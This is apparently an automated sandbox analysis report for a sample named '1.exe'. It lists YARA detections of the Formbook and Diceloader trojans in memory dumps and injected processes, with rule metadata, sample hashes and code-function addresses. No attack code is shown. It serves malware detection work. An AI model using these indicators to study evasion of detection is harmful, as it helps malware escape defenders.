Source: 00000004.00000002.4449219136.00000000030B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.4449219136.00000000030B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.4449219136.00000000030B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.4456692490.00000000108B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
Source: 00000002.00000002.2045843901.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.2045843901.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.2045843901.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.2021713062.0000000003E79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000000.00000002.2021713062.0000000003E79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.2021713062.0000000003E79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.2046258222.0000000001289000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
Source: 00000004.00000002.4449653470.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
Source: 00000004.00000002.4449610086.0000000004B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.4449610086.0000000004B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.4449610086.0000000004B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.4449093142.0000000002E20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.4449093142.0000000002E20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.4449093142.0000000002E20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: 1.exe PID: 1892, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: 1.exe PID: 2136, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: colorcpl.exe PID: 3716, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

.NET source code contains very large array initializations

Source: 0.2.1.exe.26a00000.6.raw.unpack, .cs

Large array initialization: : array initializer size 29521

.NET source code contains very large strings

Source: 1.exe, SplashScreen1.cs	Long String: Length: 81136
Source: 3.2.explorer.exe.111b7960.0.raw.unpack, SplashScreen1.cs	Long String: Length: 81136
Source: 4.2.colorcpl.exe.5377960.3.raw.unpack, SplashScreen1.cs	Long String: Length: 81136

Source: 1.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 2.2.1.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 2.2.1.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.1.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.1.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 2.2.1.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.1.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.1.exe.407d900.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0.2.1.exe.407d900.4.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.1.exe.407d900.4.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.1.exe.3fbfe60.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0.2.1.exe.3fbfe60.5.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.1.exe.3fbfe60.5.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.1.exe.4009280.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0.2.1.exe.4009280.3.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.1.exe.4009280.3.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.2046232928.0000000001270000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
Source: 00000003.00000002.4456583793.00000000103B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
Source: 00000004.00000002.4449703704.0000000004C50000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
Source: 00000004.00000002.4449219136.00000000030B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.4449219136.00000000030B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.4449219136.00000000030B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.4456692490.00000000108B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
Source: 00000002.00000002.2045843901.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.2045843901.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.2045843901.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.2021713062.0000000003E79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000000.00000002.2021713062.0000000003E79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.2021713062.0000000003E79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.2046258222.0000000001289000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
Source: 00000004.00000002.4449653470.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
Source: 00000004.00000002.4449610086.0000000004B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.4449610086.0000000004B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.4449610086.0000000004B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.4449093142.0000000002E20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.4449093142.0000000002E20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.4449093142.0000000002E20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: 1.exe PID: 1892, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: 1.exe PID: 2136, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: colorcpl.exe PID: 3716, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: C:\Users\user\Desktop\1.exe	Code function: 0_2_02C8C4D4	0_2_02C8C4D4
Source: C:\Users\user\Desktop\1.exe	Code function: 0_2_02C8DC60	0_2_02C8DC60
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_00401030	2_2_00401030
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_00408C4B	2_2_00408C4B
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_00408C50	2_2_00408C50
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0041CD5A	2_2_0041CD5A
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0041C5E0	2_2_0041C5E0
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_00402D90	2_2_00402D90
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_00402FB0	2_2_00402FB0
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017B8158	2_2_017B8158
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017CA118	2_2_017CA118
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_01720100	2_2_01720100
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017E81CC	2_2_017E81CC
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017F01AA	2_2_017F01AA
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017E41A2	2_2_017E41A2
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017C2000	2_2_017C2000
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017EA352	2_2_017EA352
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0173E3F0	2_2_0173E3F0
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017F03E6	2_2_017F03E6
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017D0274	2_2_017D0274
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017B02C0	2_2_017B02C0
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_01730535	2_2_01730535
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017F0591	2_2_017F0591
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017E2446	2_2_017E2446
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017D4420	2_2_017D4420
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017DE4F6	2_2_017DE4F6
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_01730770	2_2_01730770
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_01754750	2_2_01754750
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0172C7C0	2_2_0172C7C0
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0174C6E0	2_2_0174C6E0
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_01746962	2_2_01746962
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017329A0	2_2_017329A0
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017FA9A6	2_2_017FA9A6
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0173A840	2_2_0173A840
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_01732840	2_2_01732840
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0175E8F0	2_2_0175E8F0
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017168B8	2_2_017168B8
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017EAB40	2_2_017EAB40
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017E6BD7	2_2_017E6BD7
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0172EA80	2_2_0172EA80
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017CCD1F	2_2_017CCD1F
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0173AD00	2_2_0173AD00
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0172ADE0	2_2_0172ADE0
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_01748DBF	2_2_01748DBF
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_01730C00	2_2_01730C00
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_01720CF2	2_2_01720CF2
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017D0CB5	2_2_017D0CB5
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017A4F40	2_2_017A4F40
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_01750F30	2_2_01750F30
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017D2F30	2_2_017D2F30
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_01772F28	2_2_01772F28
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0173CFE0	2_2_0173CFE0
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_01722FC8	2_2_01722FC8
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017AEFA0	2_2_017AEFA0
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_01730E59	2_2_01730E59
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017EEE26	2_2_017EEE26
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017EEEDB	2_2_017EEEDB
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_01742E90	2_2_01742E90
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017ECE93	2_2_017ECE93
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0171F172	2_2_0171F172
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017FB16B	2_2_017FB16B
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0176516C	2_2_0176516C
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0173B1B0	2_2_0173B1B0
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017E70E9	2_2_017E70E9
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017EF0E0	2_2_017EF0E0
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017DF0CC	2_2_017DF0CC
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017370C0	2_2_017370C0
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0171D34C	2_2_0171D34C
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017E132D	2_2_017E132D
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0177739A	2_2_0177739A
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017D12ED	2_2_017D12ED
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0174B2C0	2_2_0174B2C0
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017352A0	2_2_017352A0
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017E7571	2_2_017E7571
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017F95C3	2_2_017F95C3
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017CD5B0	2_2_017CD5B0
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_01721460	2_2_01721460
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017EF43F	2_2_017EF43F
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017EF7B0	2_2_017EF7B0
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_01775630	2_2_01775630
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017E16CC	2_2_017E16CC
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_01739950	2_2_01739950
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0174B950	2_2_0174B950
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017C5910	2_2_017C5910
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0179D800	2_2_0179D800
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017338E0	2_2_017338E0
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017EFB76	2_2_017EFB76
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017A5BF0	2_2_017A5BF0
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0176DBF9	2_2_0176DBF9
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0174FB80	2_2_0174FB80
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017A3A6C	2_2_017A3A6C
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017EFA49	2_2_017EFA49
